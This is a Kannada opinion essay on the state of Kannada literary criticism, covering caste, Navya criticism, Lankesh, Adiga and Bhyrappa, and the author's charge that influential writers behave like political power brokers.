ಪಕ್ವ ಓದು ವಿಮರ್ಶೆಯ ತಳಪಾಯ

ಕನ್ನಡದ ಹಿರಿಯ ಬರಹಗಾರರು ಅತ್ಯಂತ ಪ್ರಭಾವಿಗಳಾಗಿದ್ದಾರೆ. ಸರಕಾರದಿಂದ ದುಡ್ಡು, ಪ್ರಶಸ್ತಿಗಳನ್ನು ಕೊಡಿಸುವ ಶಕ್ತಿ ಹೊಂದಿದ್ದಾರೆ. ಹೀಗಾಗಿ ಥೇಟು ನಮ್ಮ ರಾಜಕೀಯ ಧುರೀಣರಂತೆ ವರ್ತಿಸುತ್ತಾರೆ. ಇವರಿಂದಾಗಿ ವಿಮರ್ಶೆಯ ಜೀವಾಳವೇ ಆಗಿರುವ ಸ್ವತಂತ್ರ ಯೋಚನೆ, ಮುಕ್ತ ಚಿಂತನೆ, ಕೃತಿ ನಿಷ್ಠತೆ, ಓದುವ ಪರಿಶ್ರಮ ಇವೆಲ್ಲವೂ ಅಪಾಯದಲ್ಲಿವೆ.

ಮುಖ್ಯಚರ್ಚೆಯ ಟಿಪ್ಪಣಿಯಲ್ಲಿ ಎರಡು ಭಾಗಗಳಿವೆ. ಒಂದರಲ್ಲಿ, ಕೆಲವು ಮುಖ್ಯ ಸಾಹಿತಿಗಳನ್ನು ಜಾತಿ ಅಥವಾ ಸಿದ್ಧಾಂತಗಳ ಕಾರಣಕ್ಕಾಗಿ ಕೆಲವರು ಅಲಕ್ಷ್ಯ ಮಾಡಿದ್ದಾರೆ ಎನ್ನುವ ಮಾತುಗಳಿವೆ. ಎರಡನೇ ಭಾಗದಲ್ಲಿ ಎರಡು ಗಂಭೀರವಾದ ಪ್ರಶ್ನೆಗಳಿವೆ.

ಮೊದಲನೇ ಭಾಗದ ಮಾತುಗಳಿಗೆ ನಾನು ಹೆಚ್ಚು ಮಹತ್ವ ಕೊಡುವುದಿಲ್ಲ. ನಾನು ಓದುವ ಗಂಭೀರ ಕಾಳಜಿಯ ವಿಮರ್ಶಕರು ಕೃತಿಯನ್ನು ಬಿಟ್ಟು ಕೃತಿಕಾರನ ಜಾತಿ ಇತ್ಯಾದಿಗಳ ಆಧಾರದ ಮೇಲೆ ವಿಮರ್ಶೆ ಬರೆದಿಲ್ಲ. ಲಂಕೇಶ್‍ರಂಥ ಶ್ರೇಷ್ಠ ವಿಮರ್ಶಕರು ಅಡಿಗರ ಕಾವ್ಯದ ಬಗ್ಗೆ ಬರೆಯುವಾಗ ವೈದಿಕ ಪ್ರಜ್ಞೆ, ಬ್ರಾಹ್ಮಣ್ಯ ಇವುಗಳನ್ನು ಆ ಕಾವ್ಯದ ಅರ್ಥಪೂರ್ಣ ಅಂಶಗಳೇ ಆಗಿರುವ ಗ್ರಹಿಕೆಗಳು ಮತ್ತು ಜೀವನದೃಷ್ಟಿಗೆ ಸಂಬಂಧಿಸಿದಂತೆ ಬರೆಯುತ್ತಾರೆಯೆ ಹೊರತು ಅವರ ಜಾತಿಗೆ ಸಂಬಂಧಿಸಿದಂತಲ್ಲ.

ಅದೇ ರೀತಿ ‘ವಿಮರ್ಶೆಯ ವಿಮರ್ಶೆ’ ಕೃತಿಯ ಅನೇಕ ಲೇಖನಗಳಲ್ಲಿ ತೇಜಸ್ವಿ ಕೂಡ ಬ್ರಾಹ್ಮಣ ಶೂದ್ರ ಪರಿಕಲ್ಪನೆಗಳನ್ನು ಬಳಸಿಕೊಳ್ಳುತ್ತಾರೆ. ಅಲ್ಲಿಯೂ ಕೂಡ ಪ್ರಮುಖ ಧಾರೆಯ ಕನ್ನಡ ಸಾಹಿತ್ಯವು ಶೂದ್ರ ಅನುಭವಗಳಿಗೆ ಅಭಿವ್ಯಕ್ತಿ ನೀಡಿಲ್ಲವೆನ್ನುವ ತಾತ್ವಿಕ ಪ್ರಶ್ನೆಯೇ ಮುಖ್ಯವಾಗಿದೆ. ಇಂಥ ವಿಮರ್ಶಕರಲ್ಲಿರುವ ಗಾಂಭೀರ್ಯ, ತಾತ್ವಿಕ ಕಾಳಜಿಗಳು ಇಲ್ಲದವರು ವಿಮರ್ಶೆಯ ಹೆಸರಿನಲ್ಲಿ ಬೇಜವಾಬ್ದಾರಿಯ ಟೀಕೆಗಳನ್ನು ಮಾಡಿದರೆ ಅದನ್ನು ನಾವು ಗಮನಿಸಬೇಕಾಗಿಲ್ಲ. 

ಒಂದು ಮಾತಂತೂ ನಿಜ. ಜಾತಿ ಸಮಾಜದಲ್ಲಿ ಎಲ್ಲಾ ಮನುಷ್ಯ ಅನುಭವವು ಜಾತಿಯ ಹಂಗನ್ನು ಹೊತ್ತುಕೊಂಡೇ ಬರುತ್ತದೆ. ಇದು ಇತಿಹಾಸ ಹಾಗೂ ಸಾಮಾಜಿಕ ರಚನೆಗಳಿಂದ ಮತ್ತು ಇವುಗಳ ಭಾಗವೇ ಆಗಿರುವ ಸಾಹಿತ್ಯವೆನ್ನುವ ಸಂಸ್ಥೆಯ ಸ್ವರೂಪದಿಂದಾಗಿ ಇಂಥ ನೆಲೆಯನ್ನು ಪಡೆದಿರುತ್ತದೆ. ಅದನ್ನು ಬಿಟ್ಟು ವಿಮರ್ಶೆಯು ಕಾಲಾತೀತ ಹಾಗೂ ಅಚಾರಿತ್ರಿಕ ನೆಲೆಗಳಲ್ಲಿ ಸಾಹಿತ್ಯವನ್ನು ಚರ್ಚಿಸುವುದು ಅರ್ಥಹೀನವಾಗುತ್ತದೆ. ನಮ್ಮ ಸಾಹಿತ್ಯ ಮತ್ತು ವಿಮರ್ಶೆಗಳು ಜಾತಿ, ವರ್ಗ ಮತ್ತು ಲಿಂಗತ್ವಗಳನ್ನು ಆಚೆಗಿಟ್ಟರೆ ತಮ್ಮ ಪ್ರಸ್ತುತತೆಯನ್ನು ಕಳೆದುಕೊಳ್ಳುತ್ತವೆ. ಅದೇ ಹೊತ್ತಿಗೆ ಈ ಮೂರು ಚೌಕಟ್ಟುಗಳನ್ನು ವೈಯಕ್ತಿಕ ನಿಂದನೆಗಳಿಗೆ ಇಳಿಸುವುದು ವಿಮರ್ಶೆಯಲ್ಲ. ಇಷ್ಟನ್ನಾದರೂ ನಾವು ಅಂಬೇಡ್ಕರ್ ಚಿಂತನೆಯಿಂದ ಕಲಿಯಬೇಕಲ್ಲವೆ?

ವಿಶೇಷವೆಂದರೆ ಇವರು ಅತ್ಯಂತ ಪ್ರಭಾವಿಯಾಗಿ ಅನುಷ್ಠಾನಕ್ಕೆ ತಂದ ನವ್ಯವಿಮರ್ಶೆಯು ಶುರುವಾತಿಗೆ ಶುದ್ಧ ಕೃತಿನಿಷ್ಠವೆಂದು ಮತ್ತು ಅದು ಬರಹಗಾರನ ವ್ಯಕ್ತಿತ್ವ, ನಂಬಿಕೆ, ಸಿದ್ಧಾಂತಗಳು, ಅವನ ಸಾಮಾಜಿಕ, ಚಾರಿತ್ರಿಕ ಸಂದರ್ಭ ಇವೆಲ್ಲವನ್ನೂ ಅಮಾನ್ಯ ಮಾಡುತ್ತದೆ ಎಂದು ನಂಬಲಾಗಿತ್ತು.

ಇನ್ನು ಎರಡನೇ ಭಾಗದ ಪ್ರಶ್ನೆಗಳಿಗೆ ಬರೋಣ:

“ವಸ್ತುನಿಷ್ಠ ಹಾಗೂ ನಿರ್ಭಿಡೆಯ ಮೌಲ್ಯ ನಿರ್ಧಾರಕ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯೇ ಕಣ್ಮರೆಯಾಗುತ್ತಿದೆ”.

ಕನ್ನಡ ವಿಮರ್ಶೆಯ ಮೇಲೆ ಒಂದು ಹಂತದಲ್ಲಿ ಪ್ರಭಾವ ಬೀರಿದ ಎಲಿಯಟ್ ಹಾಗೂ ಲೀವಿಸ್ ಅವರ ವಿಮರ್ಶೆಯು ಕೃತಿಯ ವಿಶ್ಲೇಷಣೆ ಮತ್ತು ಮೌಲ್ಯನಿರ್ಧಾರ ಇವೆರಡನ್ನೂ ವಿಮರ್ಶೆಯ ಮೂಲಭೂತ  ಕಾಯಕಗಳೆಂದು ಭಾವಿಸಿತು. ವಿಶೇಷವೆಂದರೆ ಇವರು ಅತ್ಯಂತ ಪ್ರಭಾವಿಯಾಗಿ ಅನುಷ್ಠಾನಕ್ಕೆ ತಂದ ನವ್ಯವಿಮರ್ಶೆಯು ಶುರುವಾತಿಗೆ ಶುದ್ಧ ಕೃತಿನಿಷ್ಠವೆಂದು ಮತ್ತು ಅದು ಬರಹಗಾರನ ವ್ಯಕ್ತಿತ್ವ, ನಂಬಿಕೆ, ಸಿದ್ಧಾಂತಗಳು, ಅವನ ಸಾಮಾಜಿಕ, ಚಾರಿತ್ರಿಕ ಸಂದರ್ಭ ಇವೆಲ್ಲವನ್ನೂ ಅಮಾನ್ಯ ಮಾಡುತ್ತದೆ ಎಂದು ನಂಬಲಾಗಿತ್ತು.

ಆದರೆ ಆನಂತರದ ಸಾಹಿತ್ಯ ಸಿದ್ಧಾಂತಗಳು ಬಿಚ್ಚಿ ತೋರಿಸಿದ ಹಾಗೆ ಈ ‘ಶುದ್ಧಕೃತಿ ನಿಷ್ಠ’ ವಿಮರ್ಶೆಯು ಚರಿತ್ರೆಯ ಬಗ್ಗೆ, ನಾಗರಿಕತೆ, ಸಂಸ್ಕೃತಿಗಳ ಬಗ್ಗೆ ಹಾಗೂ ರಾಜಕೀಯದ ಬಗ್ಗೆ ಖಚಿತವಾದ ಮತ್ತು ಸಂಪ್ರದಾಯವಾದಿಯಾದ ಗ್ರಹಿಕೆಗಳನ್ನು ಒಪ್ಪಿ ಅಂತರ್ಗತ ಮಾಡಿಕೊಂಡಿತ್ತು. ಅಲ್ಲದೆ ರಾಜಕೀಯವಾಗಿ ಮತ್ತು ಸಾಂಸ್ಕೃತಿಕವಾಗಿ ಪ್ರತಿಗಾಮಿ ಧೋರಣೆಗಳನ್ನು ಹೊಂದಿದ್ದ ಎಲಿಯಟ್ ಹಾಗೂ ಲೀವಿಸ್ ತಮ್ಮದೇ ಆದ ಸಾಹ್ಯಿತ್ಯಿಕ ನಿಲುವುಗಳಿಂದಾಗಿ “ನಿರ್ಭಿಡೆ ಹಾಗೂ ಮೌಲ್ಯನಿರ್ಧಾರಕ” ವಿಮರ್ಶೆಯನ್ನು ಬರೆದರು. ಬಹುಮಟ್ಟಿಗೆ ಕೃತಿಯ ವಿಶ್ಲೇಷಣೆ ಹಾಗೂ ಮೌಲ್ಯ ನಿರ್ಧಾರಗಳ ಮಧ್ಯೆ ಇರಬೇಕಾದ ಅವಿನಾ ಸಂಬಂಧವನ್ನು ಬಿಟ್ಟುಕೊಡಲಿಲ್ಲ. ಹೀಗಾಗಿಯೇ ಅವರ ಮೌಲ್ಯನಿರ್ಧಾರಕ ತೀರ್ಮಾನಗಳನ್ನು ಪ್ರಶ್ನಿಸುವುದು ಮತ್ತು ಸಾಧಾರವಾಗಿ ತಿರಸ್ಕರಿಸುವುದು ಸಾಧ್ಯವಿದೆ.

ನವ್ಯ ವಿಮರ್ಶೆ ಕೃತಿ, ಸಂಕೀರ್ಣತೆ, ಬಂಧ ಇವುಗಳ ಬಗ್ಗೆ ಇಟ್ಟುಕೊಂಡಿದ್ದ ಸೀಮಿತವಾದ ಪರಿಕಲ್ಪನೆಗಳಿಂದಾಗಿ ಅನೇಕ ಸತ್ವಶಾಲಿ ಕೃತಿಗಳನ್ನು ಓದಲಿಲ್ಲ ಅಥವಾ ತಪ್ಪಾಗಿ ಓದಿತು.

ಕನ್ನಡದಲ್ಲಿ ಕೂಡ ಅಡಿಗರು, ಅನಂತಮೂರ್ತಿ ಇವರಿಂದ ಆರಂಭವಾದ ನವ್ಯವಿಮರ್ಶೆಯು ಕೃತಿನಿಷ್ಠವಾಗಿದ್ದೂ ಮೌಲ್ಯನಿರ್ಧಾರಕವೂ ಆಗಿತ್ತು. ಅಲ್ಲದೆ ನಮ್ಮ ಎಲ್ಲಾ ಮುಖ್ಯ ವಿಮರ್ಶಕರು ಸಾಂಸ್ಕೃತಿಕ, ಸಾಮಾಜಿಕ ನಿಲುವುಗಳನ್ನು ಖಚಿತವಾಗಿಟ್ಟುಕೊಂಡೆ ಕೃತಿ ವಿಮರ್ಶೆಯನ್ನು ಬರೆದರು. ತೊಂದರೆಯುಂಟಾಗಿದ್ದು ಅಪ್ರಾಮಾಣಿಕತೆಯಿಂದಲ್ಲ. ನವ್ಯ ವಿಮರ್ಶೆ ಕೃತಿ, ಸಂಕೀರ್ಣತೆ, ಬಂಧ ಇವುಗಳ ಬಗ್ಗೆ ಇಟ್ಟುಕೊಂಡಿದ್ದ ಸೀಮಿತವಾದ ಪರಿಕಲ್ಪನೆಗಳಿಂದಾಗಿ ಅನೇಕ ಸತ್ವಶಾಲಿ ಕೃತಿಗಳನ್ನು ಓದಲಿಲ್ಲ ಅಥವಾ ತಪ್ಪಾಗಿ ಓದಿತು. ‘ಮರಳಿ ಮಣ್ಣಿಗೆ’ ‘ಮಲೆಗಳಲ್ಲಿ ಮದುಮಗಳು’, ‘ಕುಸುಮಬಾಲೆ’, ಇವುಗಳನ್ನು ನವ್ಯ ವಿಮರ್ಶೆಯು ಓದಿದ ಕ್ರಮದಲ್ಲಿಯೇ ಮೂಲಭೂತ ದೋಷಗಳಿದ್ದವು.

ಅಡಿಗರು ‘ಸಾಕ್ಷಿ’ ಪತ್ರಿಕೆಯಲ್ಲಿ ವಾದಿಸಿದಂತೆ ಕನ್ನಡ ವಿಮರ್ಶೆಯು ವಸ್ತುನಿಷ್ಠವಾಗಿ ನಿರ್ಭಿಡೆಯಾಗಿ ಅಭಿಪ್ರಾಯ ಮಂಡಿಸುವ ಸಂಪ್ರದಾಯವನ್ನು ಬೆಳೆಸಿಕೊಂಡಿರಲಿಲ್ಲ. ಅಡಿಗರ ಪ್ರಭಾವದಿಂದಲೇ ಎನ್ನಲಾಗುತ್ತಿದ್ದರೂ ಆನಂತರದ ಅನೇಕ ವಿಮರ್ಶಕರು, ವಿಶೇಷವಾಗಿ ಲಂಕೇಶರು ಈ ಸಂಪ್ರದಾಯವನ್ನು ಬೆಳೆಸಿದರು. ಇಲ್ಲಿ ನೆನಪಿಡಬೇಕಾದುದೆಂದರೆ ಲಂಕೇಶರ ಮೌಲ್ಯನಿರ್ಧಾರಕ ತೀರ್ಮಾನಗಳು ಅತ್ಯಂತ ಸೂಕ್ಷ್ಮ ಓದಿನ ಬೆಂಬಲವನ್ನು ಪಡೆದಿದ್ದವು. ಅವರ ಓದಿನ ವಿಸ್ತಾರವೂ ಅಗಾಧವಾಗಿತ್ತು. ನನ್ನ ದೃಷ್ಟಿಯಲ್ಲಿ ಕನ್ನಡದ ಅತ್ಯುತ್ತಮ ‘ಓದುಗ’ರೆಂದರೆ ಲಂಕೇಶ್ ಮತ್ತು ಅನಂತಮೂರ್ತಿ. ಆದರೆ ದುದ್ರ್ಯೆವದಿಂದ ಲಂಕೇಶರ ‘ವಸ್ತುನಿಷ್ಠತೆ’ ಹಾಗೂ ‘ನಿರ್ಭಿಡೆ’ ಧೋರಣೆಯನ್ನು ಅಶಿಕ್ಷಿತ, ಅಸೂಕ್ಷ್ಮ ಓದಿನ ಸಾಮಥ್ರ್ಯ ಮಾತ್ರವಿರುವ ಅನೇಕರು ಒರಟುತನವೇ ಪ್ರಾಮಾಣಿಕತೆ ಎನ್ನುವ ಕ್ಷುಲ್ಲಕ ಶೈಲಿಗೆ ಇಳಿಸಿಬಿಟ್ಟರು.

ಸಾಹಿತ್ಯಕೃತಿಗಳು, ಬರಹಗಾರರು ಸಾಫ್ಟ್ ಟಾರ್ಗೆಟ್ ಆಗಿದ್ದರಿಂದ ಶೋಷಕರು ಹಾಗೂ ಕೊಲೆಗಾರರಿಗಿಂತ ಹೆಚ್ಚು ಪ್ರಮಾಣದಲ್ಲಿ ಇವರ ಮೇಲೆ ‘ನಿರ್ಭಿಡೆ’ ಆಕ್ರಮಣಗಳು ಶುರುವಾದವು. ಹೀಗಾಗಿ ‘ವಸ್ತುನಿಷ್ಠ’ ‘ನಿರ್ಭಿಡೆ’ ಇವುಗಳ ಬಗ್ಗೆ ನಾನು ತೀವ್ರ ಗುಮಾನಿಯಿಟ್ಟುಕೊಂಡಿದ್ದೇನೆ.

ನಂತರದ ದಿನಗಳಲ್ಲಿ ಒಂದು ರಾಜಕೀಯ ಹಾಗೂ ಸಾಮಾಜಿಕ ಧೋರಣೆಯ ಬರೀ ಮೇಲ್‍ಸ್ತರದ ನೆಲೆಯಿಂದ ಇಂಥದೇ ‘ನಿರ್ಭಿಡೆ’ಯನ್ನು ಪ್ರದರ್ಶಿಸುವ ಸಂಪ್ರದಾಯವೂ ಬೆಳೆದುಬಂದಿತು. ಇದು ಬಹುಮಟ್ಟಿಗೆ ಬಂಡಾಯ ಚಳವಳಿಯ ಕೊಡುಗೆಯಾಗಿತ್ತು. ಅದರಲ್ಲೂ ಸಾಹಿತ್ಯಕೃತಿಗಳು, ಬರಹಗಾರರು ಸಾಫ್ಟ್ ಟಾರ್ಗೆಟ್ ಆಗಿದ್ದರಿಂದ ಶೋಷಕರು ಹಾಗೂ ಕೊಲೆಗಾರರಿಗಿಂತ ಹೆಚ್ಚು ಪ್ರಮಾಣದಲ್ಲಿ ಇವರ ಮೇಲೆ ‘ನಿರ್ಭಿಡೆ’ ಆಕ್ರಮಣಗಳು ಶುರುವಾದವು. ಹೀಗಾಗಿ ‘ವಸ್ತುನಿಷ್ಠ’ ‘ನಿರ್ಭಿಡೆ’ ಇವುಗಳ ಬಗ್ಗೆ ನಾನು ತೀವ್ರ ಗುಮಾನಿಯಿಟ್ಟುಕೊಂಡಿದ್ದೇನೆ.

ಬರಹಗಾರನು ಬೇರೆ ಕಡೆಗೆ ಅಭಿವ್ಯಕ್ತಿಸಿದ ಅವನ ಧೋರಣೆ ಹಾಗೂ ಸಿದ್ಧಾಂತಗಳನ್ನು ಬದಿಗಿಟ್ಟು ಅವನ ಕೃತಿಯನ್ನು ನೋಡುವುದರ ಬಗ್ಗೆ ಒಂದೆರಡು ಅಂಶಗಳನ್ನೂ ಗಮನಿಸಬೇಕು. ಈ ಪ್ರಶ್ನೆ ಹೊಸದಲ್ಲ. ಕಾರ್ಲ್‍ಮಾಕ್ರ್ಸ್ ಮತ್ತು ಏಂಗಲ್ಸ್ ಇಂಥದೇ ಪ್ರಶ್ನೆಯನ್ನು ಮಿನಾ ಕೌಟಿಸ್ಕಿ ಕೇಳಿದಾಗ ನೀಡಿದ ಉತ್ತರವು ಇಂದಿಗೂ ಪ್ರಸ್ತುತವಾಗಿದೆ. ಫ್ರೆಂಚ್ ಕಾದಂಬರಿಕಾರ ಓನೂರೆ ದ ಬಾಲ್ಝಾಕ್ ವೈಯಕ್ತಿಕವಾಗಿ ಅಂದಿನ ಸಮಾಜದ ಬೂಜ್ರ್ವಾವರ್ಗವನ್ನು ಸಮರ್ಥಿಸಿದವನು. ಆದರೆ ತನ್ನ ಕಾದಂಬರಿಗಳಲ್ಲಿ ಅತ್ಯಂತ ಪ್ರಬಲವಾಗಿ ಆ ವರ್ಗದ ದೌರ್ಬಲ್ಯಗಳನ್ನು ಹಾಗೂ ಅವನತಿಯನ್ನು ದಾಖಲಿಸಿದ. ಮಾಕ್ರ್ಸ್, ಏಂಗಲ್ಸ್ ಪ್ರಕಾರ ಅವನ ಕಾದಂಬರಿಗಳನ್ನು ನಾವು ವಿಶ್ಲೇಷಿಸಬೇಕೆ ಹೊರತು ಅವನ ಧೋರಣೆಗಳನ್ನಲ್ಲ. ಇದು ಸರಿಯಾಗಿದೆ.

ಹಾಗೆಯೆ ಅಡಿಗರು ಜನಸಂಘದ ಅಭ್ಯರ್ಥಿಯಾಗಿದ್ದರು, ವೈದಿಕ ಮನೋಭಾವದವರು ಎಂದು ಅವರ ಉತ್ತಮ ಕಾವ್ಯವನ್ನು ತಿರಸ್ಕರಿಸÀಲಾಗದು. ಅದೇ ಹೊತ್ತಿಗೆ ಅವರ ಅನೇಕ ಕೆಟ್ಟಪದ್ಯಗಳಲ್ಲಿ ಅವರ ಹುಸಿಸಿದ್ಧಾಂತಗಳ ಪರಿಣಾಮವನ್ನು ಗಮನಿಸಬೇಕು. ಏಕೆಂದರೆ ಅವು ಆ ಪದ್ಯಗಳ ಭಾಗವಾಗಿವೆ. ಕನ್ನಡದ ಬಹುಪಾಲು ಒಳ್ಳೆಯ ವಿಮರ್ಶಕರು ಎಸ್.ಎಲ್.ಭೈರಪ್ಪನವರ ಪ್ರತಿಗಾಮಿ ಧೋರಣೆಗಳನ್ನು ವಿರೋಧಿಸಿದರೂ ಅವರ ‘ಪರ್ವ’, ‘ಗೃಹಭಂಗ’ ಮತ್ತು ‘ಉತ್ತರಕಾಂಡ’ ಕಾದಂಬರಿಗಳನ್ನು ಮೆಚ್ಚಿದ್ದಾರೆ. ಅಲ್ಲದೆ ‘ಕವಲು’, ‘ಆವರಣ’ ಮುಂತಾದ ಕಾದಂಬರಿಗಳು ದುರ್ಬಲ ಕಾದಂಬರಿಗಳು ಹಾಗೂ ಅವುಗಳ ದೌರ್ಬಲ್ಯವು ನೇರವಾಗಿ ಹುಸಿ ಸಿದ್ಧಾಂತಗಳಿಗೆ ಸಂಬಂಧಿಸಿದ್ದರಿಂದ ಅವನ್ನೂ ಚರ್ಚಿಸಿದ್ದಾರೆ. ಇದರಾಚೆಗೆ ಬರಹಗಾರನು ನಾಗರಿಕ ಪ್ರಜೆಯಾಗಿರುತ್ತಾನೆ ಮತ್ತು ಬರಹಗಾರನಾಗಿದ್ದರಿಂದ ಪ್ರಭಾವಿಯೂ ಆಗಿರುತ್ತಾನೆ. ಹೀಗಾಗಿ ಅವನ ಸಿದ್ಧಾಂತ ಅಥವಾ ಧೋರಣೆಗಳನ್ನು ಚರ್ಚಿಸುವುದು ಅನಿವಾರ್ಯವೇ ಆಗಿರುತ್ತದೆ.

ಇದೆಲ್ಲವನ್ನು ಮೀರಿ ಲಂಕೇಶರು, ಎಂ.ಜಿ.ಕೃಷ್ಣಮೂರ್ತಿ, ಅನಂತಮೂರ್ತಿ ಶ್ರೇಷ್ಠ ವಿಮರ್ಶೆಯನ್ನು ಬರೆದರು. ಈಗಿನ ಯುವ ಬರಹಗಾರರು ತುಂಬಾ ಜಾಣರು, ಡಿಪ್ಲಾಮೆಟಿಕ್ ಮತ್ತು ಈ ಕಾರಣಕ್ಕಾಗಿ ಅಪ್ರಾಮಾಣಿಕರಾಗಿದ್ದಾರೆ.

ಬರಹಗಾರರು ಸಾರ್ವಜನಿಕ ವಲಯದ ಸಂವಾದಗಳಲ್ಲಿ ಭಾಗಿಯಾಗುವುದು ಮತ್ತು ಪ್ರತಿಭಟನೆ, ಚಳವಳಿಗಳಲ್ಲಿ ಭಾಗವಹಿಸುವುದು ಕರ್ನಾಟಕದಲ್ಲಿ ರೂಢಿಯೇ ಆಗಿರುವುದರಿಂದ ಅವರ ವಿಚಾರಗಳು ಹಾಗೂ ಕ್ರಿಯೆಗಳು ವಿಮರ್ಶೆಗೆ ಒಳಪಡುವುದು ಸಹಜವಾಗಿದೆ. ಆದರೆ ಅವರ ಕೃತಿಗಳ ವಿಮರ್ಶೆಯಲ್ಲಿ ಅವು ಕೃತಿಯೊಂದಿಗೆ ಹತ್ತಿರದ ಸಂಬಂಧಹೊಂದಿವೆ ಎಂದಾಗ ಮಾತ್ರ ಪ್ರಸ್ತುತವಾಗುತ್ತವೆ.

‘ಸಾಕ್ಷಿ’ ಪತ್ರಿಕೆಯ ಮೊದಲ ಸಂಚಿಕೆಯಲ್ಲಿ ಅಡಿಗರು ಕನ್ನಡದಲ್ಲಿ ವಸ್ತುನಿಷ್ಠ ವಿಮರ್ಶೆ ಬೆಳೆಯದೇ ಇರುವುದಕ್ಕೆ, ವೈಯಕ್ತಿಕ ಸಂಬಂಧಗಳನ್ನು ಆಚೆಗಿಟ್ಟು ನಿಷ್ಠುರವಾಗಿ ಬರೆಯಲಾಗದ ಅಸಾಮಥ್ರ್ಯವೇ ಕಾರಣವೆಂದು ಬರೆದಿದ್ದರು. ಮತ್ತು ಹಾಗೆ ಮಾಡುವುದಕ್ಕೆ ಅವಶ್ಯಕವಾದ ನಿರ್ಭಿಡೆ ಮತ್ತು ಮುಕ್ತತೆಯ ವೈಚಾರಿಕ ವಾತಾವರಣ ಇಲ್ಲದಿರುವುದು ಕಾರಣವೆಂದಿದ್ದರು. ಇದೆಲ್ಲವನ್ನು ಮೀರಿ ಲಂಕೇಶರು, ಎಂ.ಜಿ.ಕೃಷ್ಣಮೂರ್ತಿ, ಅನಂತಮೂರ್ತಿ ಶ್ರೇಷ್ಠ ವಿಮರ್ಶೆಯನ್ನು ಬರೆದರು. ಈಗಿನ ಯುವ ಬರಹಗಾರರು ತುಂಬಾ ಜಾಣರು, ಡಿಪ್ಲಾಮೆಟಿಕ್ ಮತ್ತು ಈ ಕಾರಣಕ್ಕಾಗಿ ಅಪ್ರಾಮಾಣಿಕರಾಗಿದ್ದಾರೆ. ಪರಸ್ಪರ ಮೆಚ್ಚುಗೆ ತೋರಿಸಿ ಯಾವ ಆತಂಕವೂ ಇಲ್ಲದ ಕಂಫರ್ಟ್ ಜೋನ್ ನಲ್ಲಿದ್ದಾರೆ. ಇನ್ನೂ ಒಂದು ದೊಡ್ಡ ಗುಂಪಿನವರು ರಾಜಕೀಯವಾಗಿ ಸಮರ್ಪಕ ಧೋರಣೆ ಹೊಂದಿದ್ದಾರೆ. ಆದರೆ ಸಾಹಿತ್ಯವನ್ನು ಓದಲು ಕಲಿತಿಲ್ಲ. ನನ್ನ ದೃಷ್ಟಿಯಲ್ಲಿ ಈಗ ತೀವ್ರವಾದ, ಆಳವಾದ ಸಾಮಾಜಿಕ ವಿಮರ್ಶೆ ಕನ್ನಡದಲ್ಲಿ ವಿಫುಲವಾಗಿ ಬರುತ್ತಿದೆ. ಆದರೆ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಬತ್ತಿಹೋಗಿದೆ.

ನಮ್ಮ ನೈಜ, ದಿನನಿತ್ಯದ ಬದುಕನ್ನು ನಿಯಂತ್ರಿಸುವ ಅಧಿಕಾರ ರಾಜಕೀಯವನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ಅನುಕರಿಸುತ್ತದೆ. ಇದರ ಪರಿಣಾಮವಾಗಿ ಕನ್ನಡ ವಿಮರ್ಶೆ ಮತ್ತು ಸಾಹಿತ್ಯಗಳಲ್ಲಿ ಮಠಗಳಿವೆ.

ಎಲ್ಲಾ ಸಾಹಿತ್ಯ ಸಂಪ್ರದಾಯಗಳಂತೆ ಕನ್ನಡದಲ್ಲಿಯೂ ಎರಡು ಪ್ರಪಂಚಗಳಿವೆ. ಒಂದು, ಪ್ರಾಮಾಣಿಕ ಬರಹ, ವಸ್ತುನಿಷ್ಠ ವಿಮರ್ಶೆ, ಜಾತ್ಯಾತೀತ ಧೋರಣೆಗಳು ಹಾಗೂ ಸಮಾಜಪರವಾಗಿರುವ ಆದರ್ಶ ಸಾಹಿತ್ಯದ ಪ್ರಪಂಚ. ಇದು ನಾವು ನಂಬಬಯಸುವ ಬಹುಮಟ್ಟಿಗೆ ಕಾಲ್ಪನಿಕವಾದ ಪ್ರಪಂಚ. ಇನ್ನೊಂದು, ಸಾಹಿತ್ಯವನ್ನು ಸಾಂಸ್ಕೃತಿಕ ಬಂಡವಾಳವನ್ನಾಗಿ ಬಳಸಿಕೊಂಡು ಅಧಿಕಾರ ರಾಜಕೀಯದಲ್ಲಿ ಶಾಮೀಲಾಗುವ ಪ್ರಪಂಚ. ಈ ಎರಡನೇ ಪ್ರಪಂಚವು ಇಲ್ಲ ಅಥವಾ ಇರಬಾರದು ಎಂದು ನಾವು ಬಯಸುತ್ತೇವೆಯಾದರೂ ಅದು ವಾಸ್ತವವಾಗಿ ಇದೆ. ಹಾಗೂ ಅದು ನಮ್ಮ ನೈಜ, ದಿನನಿತ್ಯದ ಬದುಕನ್ನು ನಿಯಂತ್ರಿಸುವ ಅಧಿಕಾರ ರಾಜಕೀಯವನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ಅನುಕರಿಸುತ್ತದೆ. ಇದರ ಪರಿಣಾಮವಾಗಿ ಕನ್ನಡ ವಿಮರ್ಶೆ ಮತ್ತು ಸಾಹಿತ್ಯಗಳಲ್ಲಿ ಮಠಗಳಿವೆ. ಹಾಗೂ ಮಾಫಿಯಾಗಳಿವೆ. ಪ್ರಸಿದ್ಧ ಬರಹಗಾರರು ನಮ್ಮ ರಾಜಕೀಯ ವ್ಯಕ್ತಿಗಳಿಗಿಂತ ಭ್ರಷ್ಟರು, ಸ್ವಾರ್ಥಪರರೂ ಆಗಿದ್ದಾರೆ. ಅವರಂತೆಯೇ ಇವರು ಕೂಡ ತಮ್ಮ ಶಿಷ್ಯರು ಹಾಗೂ ಹಿಂಬಾಲಕರ ಪಡೆಯನ್ನು ಕಟ್ಟಿಕೊಂಡು ತಮ್ಮ ವರ್ಚಸ್ಸಿಗಾಗಿ ಏನನ್ನಾದರೂ ಮಾಡುತ್ತಾರೆ.

